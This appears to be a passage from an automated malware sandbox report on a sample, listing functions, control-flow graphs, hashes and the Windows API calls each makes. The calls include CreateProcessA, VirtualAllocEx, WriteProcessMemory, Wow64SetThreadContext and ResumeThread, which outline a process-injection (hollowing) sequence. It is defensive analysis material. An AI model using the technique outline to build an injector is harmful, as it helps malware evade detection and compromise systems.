                                    • GetCurrentThread.KERNEL32 ref: 00EED5A3
                                    • GetCurrentProcess.KERNEL32 ref: 00EED5E0
                                    • GetCurrentThreadId.KERNEL32 ref: 00EED639
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2240306657.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_ee0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: Current$ProcessThread
                                    • String ID: q&5
                                    • API String ID: 2063062207-3334626113
                                    • Opcode ID: f5f1f42b75b544efabb6431b97cc806124b1a173341fbce60f0538559d2b6798
                                    • Instruction ID: 524540508fdcfe61a97103b8e5f22f53518df93778049903ca515b6e9442f9f1
                                    • Opcode Fuzzy Hash: f5f1f42b75b544efabb6431b97cc806124b1a173341fbce60f0538559d2b6798
                                    • Instruction Fuzzy Hash: C3B18071A00249CFCB14DFAAD948AAEBBF1FF89304F248469E409BB361DB759D45CB50
                                    Function 00EED4E8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 496 eed4e8-eed577 GetCurrentProcess 500 eed579-eed57f 496->500 501 eed580-eed5b4 GetCurrentThread 496->501 500->501 502 eed5bd-eed5f1 GetCurrentProcess 501->502 503 eed5b6-eed5bc 501->503 505 eed5fa-eed615 call eed6b7 502->505 506 eed5f3-eed5f9 502->506 503->502 509 eed61b-eed64a GetCurrentThreadId 505->509 506->505 510 eed64c-eed652 509->510 511 eed653-eed6b5 509->511 510->511
                                    APIs
                                    • GetCurrentProcess.KERNEL32 ref: 00EED566
                                    • GetCurrentThread.KERNEL32 ref: 00EED5A3
                                    • GetCurrentProcess.KERNEL32 ref: 00EED5E0
                                    • GetCurrentThreadId.KERNEL32 ref: 00EED639
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2240306657.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_ee0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: Current$ProcessThread
                                    • String ID:
                                    • API String ID: 2063062207-0
                                    • Opcode ID: 39e53cde5530389aebf8991a9b8b0f32b47002a982c8a212d7bc5e82b3361bee
                                    • Instruction ID: 02d17317eea0f6abbf122483b5d35cc6c648a2f5ab821510cd95d2c5477c1ad9
                                    • Opcode Fuzzy Hash: 39e53cde5530389aebf8991a9b8b0f32b47002a982c8a212d7bc5e82b3361bee
                                    • Instruction Fuzzy Hash: B95147B0904349CFDB14DFAAD948BAEBBF5FF88304F208459E419A7260D7789984CF65
                                    Function 076B4B04 Relevance: 1.8, APIs: 1, Instructions: 252processCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 693 76b4b04-76b4ba5 696 76b4bde-76b4bfe 693->696 697 76b4ba7-76b4bb1 693->697 704 76b4c00-76b4c0a 696->704 705 76b4c37-76b4c66 696->705 697->696 698 76b4bb3-76b4bb5 697->698 699 76b4bd8-76b4bdb 698->699 700 76b4bb7-76b4bc1 698->700 699->696 702 76b4bc3 700->702 703 76b4bc5-76b4bd4 700->703 702->703 703->703 706 76b4bd6 703->706 704->705 707 76b4c0c-76b4c0e 704->707 713 76b4c68-76b4c72 705->713 714 76b4c9f-76b4d59 CreateProcessA 705->714 706->699 709 76b4c31-76b4c34 707->709 710 76b4c10-76b4c1a 707->710 709->705 711 76b4c1e-76b4c2d 710->711 712 76b4c1c 710->712 711->711 715 76b4c2f 711->715 712->711 713->714 716 76b4c74-76b4c76 713->716 725 76b4d5b-76b4d61 714->725 726 76b4d62-76b4de8 714->726 715->709 718 76b4c99-76b4c9c 716->718 719 76b4c78-76b4c82 716->719 718->714 720 76b4c86-76b4c95 719->720 721 76b4c84 719->721 720->720 723 76b4c97 720->723 721->720 723->718 725->726 736 76b4dea-76b4dee 726->736 737 76b4df8-76b4dfc 726->737 736->737 738 76b4df0 736->738 739 76b4dfe-76b4e02 737->739 740 76b4e0c-76b4e10 737->740 738->737 739->740 741 76b4e04 739->741 742 76b4e12-76b4e16 740->742 743 76b4e20-76b4e24 740->743 741->740 742->743 744 76b4e18 742->744 745 76b4e36-76b4e3d 743->745 746 76b4e26-76b4e2c 743->746 744->743 747 76b4e3f-76b4e4e 745->747 748 76b4e54 745->748 746->745 747->748 750 76b4e55 748->750 750->750
                                    APIs
                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 076B4D46
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2249103186.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_76b0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: ef3a01ed0a19a9ea65ec770c3b4390ec960219c62ab72e093a28b2c280f03afc
                                    • Instruction ID: 566069b5418d431884d641cdb255ce73cab39a9520fc284da592538427237269
                                    • Opcode Fuzzy Hash: ef3a01ed0a19a9ea65ec770c3b4390ec960219c62ab72e093a28b2c280f03afc
                                    • Instruction Fuzzy Hash: 15A17DB1D0025ADFDF20CFA8C8417EDBBB2BF49310F1485AAD819A7251DB749985CF92
                                    Function 076B4B10 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 751 76b4b10-76b4ba5 753 76b4bde-76b4bfe 751->753 754 76b4ba7-76b4bb1 751->754 761 76b4c00-76b4c0a 753->761 762 76b4c37-76b4c66 753->762 754->753 755 76b4bb3-76b4bb5 754->755 756 76b4bd8-76b4bdb 755->756 757 76b4bb7-76b4bc1 755->757 756->753 759 76b4bc3 757->759 760 76b4bc5-76b4bd4 757->760 759->760 760->760 763 76b4bd6 760->763 761->762 764 76b4c0c-76b4c0e 761->764 770 76b4c68-76b4c72 762->770 771 76b4c9f-76b4d59 CreateProcessA 762->771 763->756 766 76b4c31-76b4c34 764->766 767 76b4c10-76b4c1a 764->767 766->762 768 76b4c1e-76b4c2d 767->768 769 76b4c1c 767->769 768->768 772 76b4c2f 768->772 769->768 770->771 773 76b4c74-76b4c76 770->773 782 76b4d5b-76b4d61 771->782 783 76b4d62-76b4de8 771->783 772->766 775 76b4c99-76b4c9c 773->775 776 76b4c78-76b4c82 773->776 775->771 777 76b4c86-76b4c95 776->777 778 76b4c84 776->778 777->777 780 76b4c97 777->780 778->777 780->775 782->783 793 76b4dea-76b4dee 783->793 794 76b4df8-76b4dfc 783->794 793->794 795 76b4df0 793->795 796 76b4dfe-76b4e02 794->796 797 76b4e0c-76b4e10 794->797 795->794 796->797 798 76b4e04 796->798 799 76b4e12-76b4e16 797->799 800 76b4e20-76b4e24 797->800 798->797 799->800 801 76b4e18 799->801 802 76b4e36-76b4e3d 800->802 803 76b4e26-76b4e2c 800->803 801->800 804 76b4e3f-76b4e4e 802->804 805 76b4e54 802->805 803->802 804->805 807 76b4e55 805->807 807->807
                                    APIs
                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 076B4D46
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2249103186.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_76b0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: 936459ed18ef0933aef260458750a7e7324725fcfc0e1db6684427678202f645
                                    • Instruction ID: 02361cc3a6af4659e626176b9085e513ac171c9eeede75bf2df12291c7809abc
                                    • Opcode Fuzzy Hash: 936459ed18ef0933aef260458750a7e7324725fcfc0e1db6684427678202f645
                                    • Instruction Fuzzy Hash: EE917DB1D0025ACFDB24CFA8C8417EDBBB2BF49310F14856AD819A7251DB749985CF91
                                    Function 00EEAE38 Relevance: 1.7, APIs: 1, Instructions: 205COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 808 eeae38-eeae57 809 eeae59-eeae66 call ee97c0 808->809 810 eeae83-eeae87 808->810 817 eeae7c 809->817 818 eeae68 809->818 812 eeae9b-eeaedc 810->812 813 eeae89-eeae93 810->813 819 eeaede-eeaee6 812->819 820 eeaee9-eeaef7 812->820 813->812 817->810 863 eeae6e call eeb0e0 818->863 864 eeae6e call eeb0d0 818->864 819->820 821 eeaf1b-eeaf1d 820->821 822 eeaef9-eeaefe 820->822 827 eeaf20-eeaf27 821->827 824 eeaf09 822->824 825 eeaf00-eeaf07 call eea190 822->825 823 eeae74-eeae76 823->817 826 eeafb8-eeb078 823->826 831 eeaf0b-eeaf19 824->831 825->831 858 eeb07a-eeb07d 826->858 859 eeb080-eeb0ab GetModuleHandleW 826->859 828 eeaf29-eeaf31 827->828 829 eeaf34-eeaf3b 827->829 828->829 832 eeaf3d-eeaf45 829->832 833 eeaf48-eeaf51 call eea1a0 829->833 831->827 832->833 839 eeaf5e-eeaf63 833->839 840 eeaf53-eeaf5b 833->840 841 eeaf65-eeaf6c 839->841 842 eeaf81-eeaf8e 839->842 840->839 841->842 844 eeaf6e-eeaf7e call eea1b0 call eea1c0 841->844 848 eeaf90-eeafae 842->848 849 eeafb1-eeafb7 842->849 844->842 848->849 858->859 860 eeb0ad-eeb0b3 859->860 861 eeb0b4-eeb0c8 859->861 860->861 863->823 864->823
                                    APIs
                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00EEB09E
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2240306657.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_ee0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    • String ID:
                                    • API String ID: 4139908857-0
                                    • Opcode ID: 257f2770efa4afff0d0e4f7e498b7b89fb199528d0886399dd3dad582244a7fc
                                    • Instruction ID: 02b634f3a8af91d99b08d5eb7b3ccab6c2fbff64afd17cea3dead82e2bce0d1d
                                    • Opcode Fuzzy Hash: 257f2770efa4afff0d0e4f7e498b7b89fb199528d0886399dd3dad582244a7fc
                                    • Instruction Fuzzy Hash: D68146B0A00B898FDB24DF2AD45579ABBF1BF88304F148A2DD086E7A50D735F945CB91
                                    Function 00EE590C Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 973 ee590c-ee59d9 CreateActCtxA 975 ee59db-ee59e1 973->975 976 ee59e2-ee5a3c 973->976 975->976 983 ee5a3e-ee5a41 976->983 984 ee5a4b-ee5a4f 976->984 983->984 985 ee5a60 984->985 986 ee5a51-ee5a5d 984->986 988 ee5a61 985->988 986->985 988->988
                                    APIs
                                    • CreateActCtxA.KERNEL32(?), ref: 00EE59C9
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2240306657.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_ee0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: Create
                                    • String ID:
                                    • API String ID: 2289755597-0
                                    • Opcode ID: 39b9707d3e381b83f01e5c8e0ee6de6dca1b02980c3ecf42993a7bef39a78924
                                    • Instruction ID: fb2139056d9d5ff0ebc4fb9d831168a35a7b5faa2268254ad2ba50cee06698ce
                                    • Opcode Fuzzy Hash: 39b9707d3e381b83f01e5c8e0ee6de6dca1b02980c3ecf42993a7bef39a78924
                                    • Instruction Fuzzy Hash: 3D41E2B1C0065DCADB24CFAAC984BDDBBF5BF49308F20816AD408AB255DBB55946CF90
                                    Function 00EE44D4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 989 ee44d4-ee59d9 CreateActCtxA 992 ee59db-ee59e1 989->992 993 ee59e2-ee5a3c 989->993 992->993 1000 ee5a3e-ee5a41 993->1000 1001 ee5a4b-ee5a4f 993->1001 1000->1001 1002 ee5a60 1001->1002 1003 ee5a51-ee5a5d 1001->1003 1005 ee5a61 1002->1005 1003->1002 1005->1005
                                    APIs
                                    • CreateActCtxA.KERNEL32(?), ref: 00EE59C9
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2240306657.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_ee0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: Create
                                    • String ID:
                                    • API String ID: 2289755597-0
                                    • Opcode ID: 6485408caaa93db8aae56126913097b7289f92cce38781f71378e7f471c64102
                                    • Instruction ID: 882e5a15b709360abe3fd0ab320a6cd53c9816b741d273d280b24a8524c6e413
                                    • Opcode Fuzzy Hash: 6485408caaa93db8aae56126913097b7289f92cce38781f71378e7f471c64102
                                    • Instruction Fuzzy Hash: 1941E2B1C0071DCADB24CFAAC944B9DBBF5BF49304F20806AD408AB255DBB56945CF90
                                    Function 076B4881 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1006 76b4881-76b48d6 1008 76b48d8-76b48e4 1006->1008 1009 76b48e6-76b4925 WriteProcessMemory 1006->1009 1008->1009 1011 76b492e-76b495e 1009->1011 1012 76b4927-76b492d 1009->1012 1012->1011
                                    APIs
                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 076B4918
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2249103186.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_76b0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID:
                                    • API String ID: 3559483778-0
                                    • Opcode ID: 40fe8ec11a9a4e3a15bc5baf6a253a104ccdbb823479cc408552e37439e3cdd2
                                    • Instruction ID: 42d7da1d6405489c5c4e7fd3874862ae9723d15add331c29735f59bfcc6826de
                                    • Opcode Fuzzy Hash: 40fe8ec11a9a4e3a15bc5baf6a253a104ccdbb823479cc408552e37439e3cdd2
                                    • Instruction Fuzzy Hash: 4D2148B5900259DFCB10DFA9C981BEEBFF5FF48310F10842AE919A7250C7789984CBA0
                                    Function 076B4888 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 076B4918
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2249103186.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_76b0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID:
                                    • API String ID: 3559483778-0
                                    • Opcode ID: 2f0e79cb139eeb9fa3bd26cf80449f6717a3fd1603bf68a0cb5a28b05a19c8a1
                                    • Instruction ID: f94ee1f3cdd04094422675ad40ec8021ba1543615c5184362f6ef3a77d91dda9
                                    • Opcode Fuzzy Hash: 2f0e79cb139eeb9fa3bd26cf80449f6717a3fd1603bf68a0cb5a28b05a19c8a1
                                    • Instruction Fuzzy Hash: 81210AB5900359DFCB10DFAAC985BDEBBF5FF48310F108429E519A7251D7789944CBA0
                                    Function 076B4970 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                    Download Yara Rule
                                    APIs
                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 076B49F8
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2249103186.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_76b0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: MemoryProcessRead
                                    • String ID:
                                    • API String ID: 1726664587-0
                                    • Opcode ID: 6bb7a5339e0fadd66fed580c65786395db60ebf8d00b549d97c4b5f482acf550
                                    • Instruction ID: 61a9c444607d73b4c83fa5e4f23dca4c9d758fd1e0fad55a44430d92fc1979c2
                                    • Opcode Fuzzy Hash: 6bb7a5339e0fadd66fed580c65786395db60ebf8d00b549d97c4b5f482acf550
                                    • Instruction Fuzzy Hash: 9C214AB58003599FCB10DFAAD840AEEFFF5FF48320F10842AE919A7251C7789944CBA1
                                    Function 00EED728 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                    Download Yara Rule
                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EED7B7
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2240306657.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_ee0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    • String ID:
                                    • API String ID: 3793708945-0
                                    • Opcode ID: ce4a447d107a714787d079c4ae488cd08b988040c1af9f52c8cc52558597b6c8
                                    • Instruction ID: 50438befa4bc6005e4bef1ce0026151a57921c098811adc86a83cbd3c9591a27
                                    • Opcode Fuzzy Hash: ce4a447d107a714787d079c4ae488cd08b988040c1af9f52c8cc52558597b6c8
                                    • Instruction Fuzzy Hash: 8B21E0B5900248DFDB10CFAAD985AEEBFF5EB48310F14841AE958B3310D379A945CFA1
                                    Function 076B46E8 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 076B476E
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2249103186.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_76b0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID:
                                    • API String ID: 983334009-0
                                    • Opcode ID: d8b826235756d4fe93c67bb8fb31acea538b715ce50ecc79c4753c82f04502fd
                                    • Instruction ID: c5c1d716d41559c3e4fc95fba9173554fa5b3d97a82277c96d0417ae103d9d05
                                    • Opcode Fuzzy Hash: d8b826235756d4fe93c67bb8fb31acea538b715ce50ecc79c4753c82f04502fd
                                    • Instruction Fuzzy Hash: 742135B5D002498FDB10DFAAC5857EEBFF5EF49310F14842AD85AA7240DB789984CFA0
                                    Function 076B46F0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 076B476E
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2249103186.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_76b0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID:
                                    • API String ID: 983334009-0
                                    • Opcode ID: cc2901ca5063545ae6b365a6f72ee1ae3f2dadf978dba83b8319994abd4550d4
                                    • Instruction ID: 83578238dfb19c10a29d469bfa0695361f91f3c2f1837d0535297e464506ba6d
                                    • Opcode Fuzzy Hash: cc2901ca5063545ae6b365a6f72ee1ae3f2dadf978dba83b8319994abd4550d4
                                    • Instruction Fuzzy Hash: C12138B59002098FDB10DFAAC4857EEBBF4EF49310F10842AD419A7241DB78A984CFA0
                                    Function 076B4978 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                    Download Yara Rule
                                    APIs
                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 076B49F8
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2249103186.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_76b0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: MemoryProcessRead
                                    • String ID:
                                    • API String ID: 1726664587-0
                                    • Opcode ID: ae1cfdcd98bd0f9e2948c14a6d3730b14e2655ab8b4454cabb64334c83c2c2dc
                                    • Instruction ID: fb85aee6a147d105ee6de321e59c83409f42dd65c0fb5dc6234cda6f1b8548c8
                                    • Opcode Fuzzy Hash: ae1cfdcd98bd0f9e2948c14a6d3730b14e2655ab8b4454cabb64334c83c2c2dc
                                    • Instruction Fuzzy Hash: 512128B18002599FCB10DFAAC840AEEBBF5FF48310F10842AE519A7250C778A940CBA0
                                    Function 00EED730 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                    Download Yara Rule
                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EED7B7
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2240306657.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_ee0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    • String ID:
                                    • API String ID: 3793708945-0
                                    • Opcode ID: d11369eec755b6f28289a64d226263d31478912cd8dcf47f57ef07ba4f4eac7e
                                    • Instruction ID: 92793ea6d47845ae1762b0d19e5c14073161cb2fe03fa02c1d8c40916e797a41
                                    • Opcode Fuzzy Hash: d11369eec755b6f28289a64d226263d31478912cd8dcf47f57ef07ba4f4eac7e
                                    • Instruction Fuzzy Hash: 8821C2B5900248DFDB10CFAAD984ADEBBF9FB48310F14841AE918B3350D378A944CFA5
                                    Function 076B47C1 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 076B4836
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2249103186.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_76b0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 900c4a657e813756865bdcc52ffc90f12b8cf4046c26ad1b0b97f38b3aa8abfe
                                    • Instruction ID: 1dee82a4191346222cdba7a2a21683c148191ee996eca83e747925a4bfeb2755
                                    • Opcode Fuzzy Hash: 900c4a657e813756865bdcc52ffc90f12b8cf4046c26ad1b0b97f38b3aa8abfe
                                    • Instruction Fuzzy Hash: DD1129B59002499FCB20DFAAD9446EFBFF5EF49310F14841AE519A7250CB799544CFA0
                                    Function 076B47C8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 076B4836
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2249103186.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_76b0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 61d2396427fad60f77a5a725b56518a9ba344b82cb46ae438a3fd2e6c1003381
                                    • Instruction ID: b084346066b1d9ff12df82ad7a98621c35e35db48658e4fb9557adfeda0d253b
                                    • Opcode Fuzzy Hash: 61d2396427fad60f77a5a725b56518a9ba344b82cb46ae438a3fd2e6c1003381
                                    • Instruction Fuzzy Hash: 541137B59002499FCB20DFAAD844AEFBFF5EF49320F108419E519A7250CB79A540CFA0
                                    Function 076B4200 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2249103186.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_76b0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: ResumeThread
                                    • String ID:
                                    • API String ID: 947044025-0
                                    • Opcode ID: 2752d1d13142bfcec42f7322ee9bdfdf152e8701c6122c6bcd1ea38d878a9c2c
                                    • Instruction ID: 96e3a3437ce605796635c2a82747ba737972ad1c5354dec21a72116b88dd5f22
                                    • Opcode Fuzzy Hash: 2752d1d13142bfcec42f7322ee9bdfdf152e8701c6122c6bcd1ea38d878a9c2c
                                    • Instruction Fuzzy Hash: 7E1128B5D002498EDB20DFAAD5457EEFBF5AF88314F14841AD419A7250CB78A944CFA4
                                    Function 076B4208 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2249103186.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_76b0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: ResumeThread
                                    • String ID:
                                    • API String ID: 947044025-0
                                    • Opcode ID: 4dbc776f33bcd81c9fcf86d6fd65f3d3f6e310c7ee3e8da09145d3965fab0d12
                                    • Instruction ID: f605fe9ee0788a0bb595ab9d352d38ce1dfa94dc4e05a1e1e0cdaf873452d0b2
                                    • Opcode Fuzzy Hash: 4dbc776f33bcd81c9fcf86d6fd65f3d3f6e310c7ee3e8da09145d3965fab0d12
                                    • Instruction Fuzzy Hash: 6E1128B19002498BCB20DFAAC4457EEFBF5EF89320F108419D519A7250CB79A544CFA4
                                    Function 076B75BC Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 076B7CAD
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2249103186.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_76b0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: MessagePost
                                    • String ID:
                                    • API String ID: 410705778-0
                                    • Opcode ID: 240f31950dbf7c2b6512fa25ab11eb1da9e27ef18ac70445b011e6b708c9fb20
                                    • Instruction ID: 235d11455f349f59df3467f687fd9478afa51b73ddbad8240b3a62aff41f19db
                                    • Opcode Fuzzy Hash: 240f31950dbf7c2b6512fa25ab11eb1da9e27ef18ac70445b011e6b708c9fb20
                                    • Instruction Fuzzy Hash: 1511F5B5800349DFCB20DF9AD545BDEBBF8EB49320F10841AE519A7300C379A984CFA1
                                    Function 076B7C48 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 076B7CAD
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2249103186.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_76b0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: MessagePost
                                    • String ID:
                                    • API String ID: 410705778-0
                                    • Opcode ID: 562e5da415c5db6b74bd99a9c5845f734c810eeaecd55cf4998fbc616582ab3f
                                    • Instruction ID: d0a2896a6a68584754a69e232588db0f7ac2a3ba647971c542f2d1a7cd9d066d
                                    • Opcode Fuzzy Hash: 562e5da415c5db6b74bd99a9c5845f734c810eeaecd55cf4998fbc616582ab3f
                                    • Instruction Fuzzy Hash: 9E11F5B5800349DFCB20DF9AD945BEEBBF8EB49320F10841AD519A7200C379A584CFA5
                                    Function 00EEB038 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00EEB09E
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2240306657.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_ee0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    • String ID:
                                    • API String ID: 4139908857-0
                                    • Opcode ID: 7e59cb36832b0ee3aea5c7cfcffd2299cc18717abb50de680b9d15d8fc53f4fa
                                    • Instruction ID: d6e1809803d861e7947f705a7ec84d51b8a7f9582f017a6c8b9cbd31f227e66a
                                    • Opcode Fuzzy Hash: 7e59cb36832b0ee3aea5c7cfcffd2299cc18717abb50de680b9d15d8fc53f4fa
                                    • Instruction Fuzzy Hash: 8F11DFB6C00249CFCB10DF9AD444A9FFBF4AB88324F10841AD929B7210D3B9A645CFA1
                                    Function 00C8D3D8 Relevance: .1, Instructions: 75COMMON
                                    Download Yara Rule
                                    Memory Dump Source
